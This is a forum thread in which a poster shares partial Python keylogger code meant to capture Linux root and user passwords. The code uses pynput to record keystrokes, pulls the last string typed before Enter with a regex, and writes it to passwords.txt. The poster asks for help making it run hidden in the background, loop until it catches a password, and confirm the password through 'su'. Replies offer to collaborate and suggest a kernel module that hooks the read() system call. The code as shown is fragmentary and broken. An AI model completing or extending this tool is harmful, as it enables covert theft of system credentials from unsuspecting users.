Linux Root Password Keylogger: Help needed

Hi all

I have created a keylogger for the sole purpose of logging user or root password.
It logs everything, stores everything in a list at runtime
It has a function to sort data, basically this assumes that the last entered password is the correct password.

from pynput.keyboard import Listener, Key
import re

keys = []

def on_press(key):
    global keys

def on_release(key):
    if key == Key.esc:
        return False

with Listener(on_press=on_press, on_release=on_release) as listener:

# for sorting KeyCode and searching for password
def sort_pass():
    x = str(keys)
    replc = x.replace("'", "")
    replc2 = replc.replace(", ", "")
    y = re.findall(r">>(.*?)<Key.enter:", str(replc2))
    root_password = y[-1]
    print(f"Password Found: {root_password}")

    # for saving the last typed password to a file
    file = open('passwords.txt', 'w')


Seems good to me so far, but it only saves password when your press escape key at the same terminal where you started the script. This is what I want to change.

Here is the improvements I am looking for:

1: automatically start the script (it does this but I want this to go in background)

2: currently the on_release function ends the script and grabs password when escape key is pressed; I want this script to store keystrokes for 30 minutes and after that look for password, if not found then clean the list and start up the logger again, I want this to be running as much as possible and end only when it catches the password.

3: I have another function to run system commands and see if the password is correct (I can get this done myself)

4: I want to store the password as ‘correct password’ only if I am able to perform ‘su username’ successfully (I can get this done myself)

Can anyone help me or do anyone want to collaborate?

Yes I can help you text me

My Github Account for example Keyloggers :

1 Like

I Think for this you need to know system call hooking. You can log keystors by hooking system calls like sys_read () or read (). All you have to do is develop an LKM (Loadable Kernel Module) that will manipulate the Read () system call and replace it, and install it to the kernel.

And This is Example For you , This LKM Manipulating the read() system call :

1 Like

This topic was automatically closed after 121 days. New replies are no longer allowed.